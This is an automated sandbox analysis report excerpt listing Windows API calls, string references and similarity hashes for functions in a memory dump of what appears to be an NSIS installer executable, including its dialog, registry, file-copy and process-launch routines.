• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
• API String ID: 1033533793-4193110038
• Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
• Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
• Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
• Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
• MulDiv.KERNEL32(00010A00,00000064,000D2B75), ref: 00403295
• wsprintfW.USER32 ref: 004032A5
• SetWindowTextW.USER32(?,?), ref: 004032B5
• SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: u+$verifying installer: %d%%
• API String ID: 1451636040-2773432420
• Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
• Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
• Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
• Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
• CharNextW.USER32(?,?,?,00000000), ref: 004060D6
• CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
• CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
• Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
• Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
• Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
• Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
• Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
APIs
• GetDlgItem.USER32(?), ref: 004020A3
• GetClientRect.USER32(00000000,?), ref: 004020B0
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
• DeleteObject.GDI32(00000000), ref: 004020EE
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
• Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
• Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
• Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                    • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
• String ID: CopyFiles "%s"->"%s"
• API String ID: 2577523808-3778932970
• Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
• Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
• Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
• Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: lstrcatwsprintf
• String ID: %02x%c$...
• API String ID: 3065427908-1057055748
• Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
• Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
• CreateFontIndirectW.GDI32(00420110), ref: 0040216A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
